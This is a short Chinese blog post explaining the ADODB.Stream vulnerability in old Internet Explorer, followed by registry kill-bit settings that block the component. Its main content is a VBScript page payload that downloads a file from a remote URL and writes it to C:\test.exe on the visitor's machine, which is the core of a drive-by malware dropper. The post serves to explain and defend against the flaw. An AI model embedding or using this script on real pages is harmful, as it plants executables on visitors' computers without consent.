ADODB.Stream漏洞

ADODB.stream漏洞简介

<script language=vbscript>
  const adTypeBinary=1
  const adSaveCreateOverwrite=2
  const adModeReadWrite=3
  set xmlHTTP=createObject("microsoft.xmlHTTP")
  xmlHTTP.open "GET","目标URL,可以是任意文件",false   '最后一个参数是设置是否异步访问
  xmlHTTP.send
  contents=xmlHTTP.responseBody  '这里是关键,也可以不用xmlHTTP对象,用HTTP也可以,
                                                        '但要返回有文件的内容
  set oStr=createObject("ADODB.stream")
  oStr.mode=adModeReadWrite
  oStr.Type=adTypeBinary
  oStr.open
  ostr.write(contents)   '前面返回的内容
  oStr.savetofile "C:\\test.exe",adSaveCreateOverwrite
</script>
  

如何防范?
1下载专杀工具,估计也是卸载adodb.stream

2改注册表

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet

Explorer\ActiveX Compatibility\{4B106874-DD36-11D0-8B44-00A024DD9EFF}
里dword值Compatibility Flags=0x00000400

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet

Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}

里dword值Compatibility Flags=0x00000400
第一个是adodb.stream2.5 第二个是2.7
这样 Internet Explorer 识别此注册表项时,Internet Explorer 不允许在浏览器中启动此组件。

原文地址:https://www.cnblogs.com/goodloop/p/295758.html